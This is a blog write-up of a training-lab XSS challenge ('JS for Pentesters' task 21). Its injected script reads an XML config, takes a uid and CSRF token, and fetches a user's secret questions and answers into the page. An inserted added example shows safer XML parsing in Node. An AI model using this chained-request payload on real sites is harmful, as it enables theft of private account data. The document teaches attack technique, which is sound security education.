XSS - Multilevel XML Parsing: JS for Pentesters task 21 write up

Nov 3, 2014 • jsp, javascript, xss, security-tube

Write-up for task 21 of the JS for Pentesters series by SecurityTube: Multilevel XML parsing.

We have already seen and cracked the challenges that deal with multilevel JSON and HTML parsing. Now let us look into the third one, namely parsing XML.

JS for Pentesters task 21

The objective of this challenge is to find John's secret questions and answers using an XSS vulnerability on this page and display the questions and answers in the div with id "result". Before carrying on with the challenge, I strongly recommend that you read "Ajax: Parsing and reading XML files" for the basics of how to parse and read an XML file using Ajax.

    <script>
        // First request: fetch the XML document that tells us where the
        // secret endpoint is and which uid/token parameters it expects.
        var request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if ((request.readyState === 4) && (request.status === 200)) {
                // responseXML is a parsed DOM, so the usual element lookups work.
                var endpoint = request.responseXML.getElementsByTagName('endpoint')[0].firstChild.nodeValue;
                var uid = request.responseXML.getElementsByTagName('uid-param-value')[0].firstChild.nodeValue;
                var csrf_token = request.responseXML.getElementsByTagName('token-param-value')[0].firstChild.nodeValue;

                // Second request: call the endpoint with the values read from the XML.
                var req = new XMLHttpRequest();
                var url = endpoint + "?uid=" + uid + "&token=" + csrf_token;
                alert(url); // debugging aid: shows the assembled URL before it is requested
                req.open('GET', url);
                req.onreadystatechange = function() {
                    if ((req.readyState === 4) && (req.status === 200)) {
                        // Display the questions and answers in the "result" div.
                        document.getElementById("result").innerHTML = req.responseText;
                    }
                };
                req.send();
            }
        };
        request.open('GET', '/lab/webapp/jfp/21/getxml');
        request.send();
    </script>

Since the response we get from the request is in XML format, we use the property responseXML instead of responseText. responseXML is a parsed document, so we can pick out any values we need just as we would from an HTML document. That is why you can see us reading the values from the XML document with getElementsByTagName(), the same method that is usually used to select elements from an HTML page.
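To make the XML-reading step concrete, here is an added example (not part of the original write-up or the lab) that does the same extraction outside a browser. In the browser the values come from `request.responseXML.getElementsByTagName(tag)[0].firstChild.nodeValue`; under Node there is no DOM, so the hypothetical helper `firstTagText()` does the equivalent on a raw XML string. The XML document, the endpoint path `/example/endpoint` and the uid/token values are all constructed sample input, not the lab's real response. The example also handles the case the original code does not: a missing element returns null instead of throwing a TypeError, and the query-string values are percent-encoded so a token containing `&` or `=` cannot break the URL.

```javascript
// Added example, not code from the original write-up. The XML below is
// constructed sample input with placeholder values.
const SAMPLE_XML = `<?xml version="1.0"?>
<config>
  <endpoint>/example/endpoint</endpoint>
  <uid-param-value>42</uid-param-value>
  <token-param-value>abc&amp;123</token-param-value>
</config>`;

// Decode the entities an XML text node can carry. A real DOM text node's
// nodeValue is already decoded, so this keeps the helper's output equivalent.
// &amp; is handled last so that "&amp;lt;" correctly becomes "&lt;".
function decodeXmlEntities(s) {
  return s.replace(/&lt;/g, '<').replace(/&gt;/g, '>')
          .replace(/&quot;/g, '"').replace(/&apos;/g, "'")
          .replace(/&amp;/g, '&');
}

// Return the text of the first <tag>...</tag> element, or null when the
// element is absent. Hypothetical helper standing in for
// responseXML.getElementsByTagName(tag)[0].firstChild.nodeValue.
function firstTagText(xml, tag) {
  // "(?:\s[^>]*)?" allows attributes and stops <endpoint> matching <endpointx>.
  const re = new RegExp('<' + tag + '(?:\\s[^>]*)?>([\\s\\S]*?)</' + tag + '>');
  const m = re.exec(xml);
  return m ? decodeXmlEntities(m[1].trim()) : null;
}

// Assemble the URL for the second request from the three XML values.
// Returns null if any of them is missing; encodes the parameters so they
// cannot inject extra query parameters (the write-up concatenates raw values).
function buildSecretUrl(xml) {
  const endpoint = firstTagText(xml, 'endpoint');
  const uid = firstTagText(xml, 'uid-param-value');
  const token = firstTagText(xml, 'token-param-value');
  if (endpoint === null || uid === null || token === null) {
    return null;
  }
  return endpoint + '?uid=' + encodeURIComponent(uid) +
         '&token=' + encodeURIComponent(token);
}

console.log(buildSecretUrl(SAMPLE_XML));
// prints "/example/endpoint?uid=42&token=abc%26123"
```

Note the encoding of the token: the sample value `abc&123` becomes `abc%26123`, so the server sees one `token` parameter rather than a second, truncated one. When you display the fetched result on a page, prefer assigning to `textContent` over `innerHTML` unless you actually intend the response's markup to be rendered.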

Note:

1) While working on XSS challenges, it is recommended to use Mozilla Firefox, because Google Chrome has a built-in XSS filter (the XSS Auditor) that can block the injected JavaScript from executing even when the page is vulnerable to XSS. So it is strongly recommended to use Firefox instead of Chrome.

We hope you really liked this challenge. If there is anything you didn't understand or would like more clarity on, please leave a comment below and we will be more than happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!

With this, we complete the write-ups for the Pentester Academy JavaScript for Pentesters course challenges. Hope you enjoyed solving the challenges as much as we did :)

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE